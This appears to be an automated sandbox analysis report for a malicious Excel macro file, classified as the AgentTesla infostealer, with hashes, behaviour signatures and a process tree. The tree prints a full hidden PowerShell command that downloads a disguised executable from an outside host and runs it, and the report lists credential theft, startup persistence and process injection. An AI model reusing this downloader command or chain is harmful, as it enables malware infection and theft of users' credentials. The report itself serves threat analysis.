Analysis
-
max time kernel
137s -
max time network
137s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
10-07-2020 07:13
Static task
static1
Behavioral task
behavioral1
Sample
CO-MFE-6-2020.xlsm
Resource
win7
Behavioral task
behavioral2
Sample
CO-MFE-6-2020.xlsm
Resource
win10v200430
General
-
Target
CO-MFE-6-2020.xlsm
-
Size
173KB
-
MD5
84ba27c4b3083be263a54322adec3149
-
SHA1
2548d9097c1b27f064a7089afe393fde0fbfa64d
-
SHA256
fbe5f71e75c1b92c68a6da3698f42a2ca2f9fcc6f620f494c562583c194b2011
-
SHA512
1553f2c39b55a83161326b232b507d3cf957f633462ccd6bf19b9f6890ded4d70c7c0459347f88cf45c0c846e54672a393914b6f66778748b351e397743a914e
Malware Config
Extracted
http://shopcart.indbytes.com/cig/4501307788.jpg
Signatures
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exeName.exedescription pid process target process PID 1612 wrote to memory of 3864 1612 EXCEL.EXE cmd.exe PID 1612 wrote to memory of 3864 1612 EXCEL.EXE cmd.exe PID 3864 wrote to memory of 3472 3864 cmd.exe powershell.exe PID 3864 wrote to memory of 3472 3864 cmd.exe powershell.exe PID 3472 wrote to memory of 1072 3472 powershell.exe Name.exe PID 3472 wrote to memory of 1072 3472 powershell.exe Name.exe PID 3472 wrote to memory of 1072 3472 powershell.exe Name.exe PID 1072 wrote to memory of 3792 1072 Name.exe RegAsm.exe PID 1072 wrote to memory of 3792 1072 Name.exe RegAsm.exe PID 1072 wrote to memory of 3792 1072 Name.exe RegAsm.exe PID 1072 wrote to memory of 3792 1072 Name.exe RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exeRegAsm.exepid process 3472 powershell.exe 3472 powershell.exe 3472 powershell.exe 3792 RegAsm.exe 3792 RegAsm.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Name.exedescription pid process target process PID 1072 set thread context of 3792 1072 Name.exe RegAsm.exe -
Drops startup file 1 IoCs
Processes:
Name.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe Name.exe -
Executes dropped EXE 1 IoCs
Processes:
Name.exepid process 1072 Name.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3864 1612 cmd.exe EXCEL.EXE -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 17 3472 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
Name.exepid process 1072 Name.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
EXCEL.EXERegAsm.exepid process 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 3792 RegAsm.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1612 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 3472 powershell.exe Token: SeDebugPrivilege 3792 RegAsm.exe -
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\CO-MFE-6-2020.xlsm"1⤵
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID:1612 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')2⤵
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
PID:3864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')3⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3472 -
C:\Users\Admin\AppData\Local\Temp\Name.exe"C:\Users\Admin\AppData\Local\Temp\Name.exe"4⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
PID:1072 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of AdjustPrivilegeToken
PID:3792